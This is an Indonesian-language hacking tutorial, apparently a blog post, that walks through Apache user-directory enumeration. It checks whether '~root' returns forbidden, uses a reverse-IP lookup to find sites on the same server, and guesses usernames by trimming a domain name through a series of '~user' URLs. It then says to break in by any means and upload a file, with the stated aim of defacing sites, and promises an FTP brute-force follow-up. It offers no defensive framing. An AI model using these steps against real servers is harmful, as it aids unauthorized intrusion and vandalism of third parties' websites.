Apache User Enumeration
User enumerate merupakan kelemahan dari apache, misalkan 1 user di apache itu dapat dibaca maka user yang laen pun juga bisa.
Dan jelas bisa dimanfaatkan qe3.
Caranya sebagai berikut :
1. tetapkan target yang akan kita cari user enum nya misal <span style="color: #ff0000;">http://site-A.com</span>
2. Cek apakah web sasaran vuln user enum apa enggak,caranya kaya contoh
http://site-A.com/~root < kalo forbidden brarti dia vuln
3. kemudian cari reverse ip dari http://site-A.com,
misal http://www.ip-adress.com/reverse_ip/123.354.738
4. Pilih salah satu web yang tercantum di reverse ip tersebut,contoh http://aduhcakepnyaaku.com
5. kita testing apakah user dari http://aduhcakepnyaaku.com caranya begini :
http://site-A.com/~aduhcakepnyaaku
http://site-A.com/~aduhcakepnyaak
http://site-A.com/~aduhcakepnyaa
http://site-A.com/~aduhcakepnya
http://site-A.com/~aduhcakepny
http://site-A.com/~aduhcakepn
http://site-A.com/~aduhcakep
http://site-A.com/~aduhcakep < site http://aduhcakepnyaaku.com udah kebuka
sekarang kita masuk ke web tersebut dengan cara apa aja asal bisa masuk.
6. Upload file ke web yg kita masuki tadi
7. sekarang kita liat file yang udah kita upload tadi
http://site-A.com/~aduhcakep/explore.html
Cara ini efektif buat yang doyan deface² ( penuhin aja tuh indeves ),ntar yang user enum buat ftp brute force nyusul yah tutornya.
Sekian terima kasih
Kluarga Besar T.I Sniper
Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.